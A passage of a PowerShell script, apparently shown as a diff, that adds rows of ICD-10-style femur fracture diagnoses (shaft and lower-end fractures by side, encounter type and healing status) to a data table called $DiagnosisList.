$DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of right femur","Nondisplaced segmental fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of left femur","Nondisplaced segmental fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced segmental fracture of shaft of unspecified femur","Nondisplaced segmental fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of right femur","Other fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of left femur","Other fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of shaft of unspecified femur","Other fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of right femur","Unspecified fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of left femur","Unspecified fracture of lower end of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of lower end of unspecified femur","Unspecified fracture of lower end of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of right femur","Displaced unspecified condyle fracture of lower end of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced unspecified condyle fracture of lower end of left femur","Displaced unspecified condyle fracture of lower end of left femur, subsequent encounter for open fracture type IIIA, 